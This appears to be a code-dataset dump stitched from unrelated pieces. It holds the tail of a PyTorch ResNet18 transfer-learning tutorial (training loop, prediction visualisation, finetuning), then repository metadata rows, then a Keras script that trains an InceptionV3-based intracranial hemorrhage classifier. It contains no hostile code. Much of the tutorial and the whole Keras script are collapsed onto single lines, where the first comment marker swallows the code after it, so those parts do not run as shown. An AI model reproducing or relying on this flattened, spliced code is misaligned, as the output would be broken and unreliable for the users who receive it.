        model: the network to train (already moved to ``device``).
        criterion: loss function.
        optimizer: optimizer over the parameters to be trained.
        scheduler: LR scheduler from ``torch.optim.lr_scheduler``; stepped
            once per epoch after the training phase.
        num_epochs: number of epochs to run.

    Returns:
        The model with the weights that achieved the best validation
        accuracy loaded back in.
    """
    since = time.time()

    best_model_wts = copy.deepcopy(model.state_dict())
    best_acc = 0.0

    for epoch in range(num_epochs):
        print('Epoch {}/{}'.format(epoch, num_epochs - 1))
        print('-' * 10)

        # Each epoch has a training and validation phase
        for phase in ['train', 'val']:
            if phase == 'train':
                model.train()  # Set model to training mode
            else:
                model.eval()   # Set model to evaluate mode

            running_loss = 0.0
            running_corrects = 0

            # Iterate over data.
            for inputs, labels in dataloaders[phase]:
                inputs = inputs.to(device)
                labels = labels.to(device)

                # zero the parameter gradients
                optimizer.zero_grad()

                # forward
                # track history if only in train
                with torch.set_grad_enabled(phase == 'train'):
                    outputs = model(inputs)
                    _, preds = torch.max(outputs, 1)
                    loss = criterion(outputs, labels)

                    # backward + optimize only if in training phase
                    if phase == 'train':
                        loss.backward()
                        optimizer.step()

                # statistics (loss.item() is the batch mean, so re-weight
                # by batch size to accumulate a dataset-level sum)
                running_loss += loss.item() * inputs.size(0)
                running_corrects += torch.sum(preds == labels.data)

            # Step the LR schedule once per epoch, after optimizer updates.
            if phase == 'train':
                scheduler.step()

            epoch_loss = running_loss / dataset_sizes[phase]
            epoch_acc = running_corrects.double() / dataset_sizes[phase]

            print('{} Loss: {:.4f} Acc: {:.4f}'.format(
                phase, epoch_loss, epoch_acc))

            # deep copy the model
            if phase == 'val' and epoch_acc > best_acc:
                best_acc = epoch_acc
                best_model_wts = copy.deepcopy(model.state_dict())

        print()

    time_elapsed = time.time() - since
    print('Training complete in {:.0f}m {:.0f}s'.format(
        time_elapsed // 60, time_elapsed % 60))
    # FIX: was '{:4f}' (width 4, full precision) — use '{:.4f}' for four
    # decimal places, consistent with the per-epoch accuracy print above.
    print('Best val Acc: {:.4f}'.format(best_acc))

    # load best model weights
    model.load_state_dict(best_model_wts)
    return model


######################################################################
# Visualizing the model predictions
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# Generic function to display predictions for a few images
#


def visualize_model(model, num_images=6):
    """Show ``num_images`` validation images with the model's predictions.

    Restores the model's original train/eval state before returning.
    """
    was_training = model.training
    model.eval()
    images_so_far = 0
    fig = plt.figure()

    with torch.no_grad():
        for i, (inputs, labels) in enumerate(dataloaders['val']):
            inputs = inputs.to(device)
            labels = labels.to(device)

            outputs = model(inputs)
            _, preds = torch.max(outputs, 1)

            for j in range(inputs.size()[0]):
                images_so_far += 1
                ax = plt.subplot(num_images//2, 2, images_so_far)
                ax.axis('off')
                ax.set_title('predicted: {}'.format(class_names[preds[j]]))
                imshow(inputs.cpu().data[j])

                if images_so_far == num_images:
                    model.train(mode=was_training)
                    return
        model.train(mode=was_training)
###################################################################### # Finetuning the convnet # ---------------------- # # Load a pretrained model and reset final fully connected layer. # model_ft = models.resnet18(pretrained=True) num_ftrs = model_ft.fc.in_features # Here the size of each output sample is set to 2. # Alternatively, it can be generalized to nn.Linear(num_ftrs, len(class_names)). model_ft.fc = nn.Linear(num_ftrs, 2) model_ft = model_ft.to(device) criterion = nn.CrossEntropyLoss() # Observe that all parameters are being optimized optimizer_ft = optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9) # Decay LR by a factor of 0.1 every 7 epochs exp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=7, gamma=0.1) ###################################################################### # Train and evaluate # ^^^^^^^^^^^^^^^^^^ # # It should take around 15-25 min on CPU. On GPU though, it takes less than a # minute. # model_ft = train_model(model_ft, criterion, optimizer_ft, exp_lr_scheduler, num_epochs=25) ###################################################################### # visualize_model(model_ft) ###################################################################### # ConvNet as fixed feature extractor # ---------------------------------- # # Here, we need to freeze all the network except the final layer. We need # to set ``requires_grad == False`` to freeze the parameters so that the # gradients are not computed in ``backward()``. # # You can read more about this in the documentation # `here <https://pytorch.org/docs/notes/autograd.html#excluding-subgraphs-from-backward>`__. 
# model_conv = torchvision.models.resnet18(pretrained=True) for param in model_conv.parameters(): param.requires_grad = False # Parameters of newly constructed modules have requires_grad=True by default num_ftrs = model_conv.fc.in_features model_conv.fc = nn.Linear(num_ftrs, 2) model_conv = model_conv.to(device) criterion = nn.CrossEntropyLoss() # Observe that only parameters of final layer are being optimized as # opposed to before. optimizer_conv = optim.SGD(model_conv.fc.parameters(), lr=0.001, momentum=0.9) # Decay LR by a factor of 0.1 every 7 epochs exp_lr_scheduler = lr_scheduler.StepLR(optimizer_conv, step_size=7, gamma=0.1) ###################################################################### # Train and evaluate # ^^^^^^^^^^^^^^^^^^ # # On CPU this will take about half the time compared to previous scenario. # This is expected as gradients don't need to be computed for most of the # network. However, forward does need to be computed. # model_conv = train_model(model_conv, criterion, optimizer_conv, exp_lr_scheduler, num_epochs=25) ###################################################################### # visualize_model(model_conv) plt.ioff() plt.show()
33.035608
92
0.603431
795abcb805969bdf90b9b8811861d47bd44ce9aa
2,049
py
Python
src/train.py
kshannon/intracranial-hemorrhage-detection
fd65c44c487ab07faaed5d39cc238f70b95891bc
[ "MIT" ]
7
2019-09-30T02:30:49.000Z
2020-01-25T04:23:19.000Z
src/train.py
kshannon/intracranial-hemorrhage-detection
fd65c44c487ab07faaed5d39cc238f70b95891bc
[ "MIT" ]
18
2019-09-28T18:41:46.000Z
2019-11-10T21:42:02.000Z
src/train.py
kshannon/intracranial-hemorrhage-detection
fd65c44c487ab07faaed5d39cc238f70b95891bc
[ "MIT" ]
4
2020-01-25T04:23:21.000Z
2020-11-17T17:34:24.000Z
from datetime import datetime from model import MyDeepModel, create_submission from data_loader import read_testset, read_trainset, DataGenerator import keras as K from sklearn.model_selection import ShuffleSplit # from K_applications.resnet import ResNet50 from keras.applications.inception_v3 import InceptionV3 from keras.applications.inception_resnet_v2 import InceptionResNetV2, preprocess_input from keras.applications.densenet import DenseNet121 from keras.applications.mobilenet_v2 import MobileNetV2 test_images_dir = '../../data/stage_1_test_images/' train_images_dir = '../../data/stage_1_train_images/' trainset_filename = "../../data/stage_1_train.csv" testset_filename = "../../stage_1_sample_submission.csv" num_epochs = 10 img_shape = (256,256,3) batch_size=32 TRAINING =True # If False, then just load model and predict engine=InceptionV3 model_filename="InceptionV3_{}.hdf5".format(datetime.now().strftime('%Y_%m_%d_%H_%M_%S')) #model_filename="wrapper_2019_11_02_22_06_45.hdf5" # obtain model model = MyDeepModel(engine=engine, input_dims=img_shape, batch_size=batch_size, learning_rate=5e-4, num_epochs=num_epochs, decay_rate=0.8, decay_steps=1, weights="imagenet", verbose=1, train_image_dir=train_images_dir, model_filename=model_filename) model.load("epoch2.hdf5") #model.load(model_filename) # Use previous checkpoint if (TRAINING == True): df = read_trainset(trainset_filename) ss = ShuffleSplit(n_splits=10, test_size=0.1, random_state=816).split(df.index) # lets go for the first fold only train_idx, valid_idx = next(ss) # Train the model model.fit_model(df.iloc[train_idx], df.iloc[valid_idx]) test_df = read_testset(testset_filename) test_generator = DataGenerator(test_df.index, None, 1, img_shape, test_images_dir) best_model = K.models.load_model(model.model_filename, compile=False) prediction_df = create_submission(best_model, test_generator, test_df)
34.728814
89
0.752074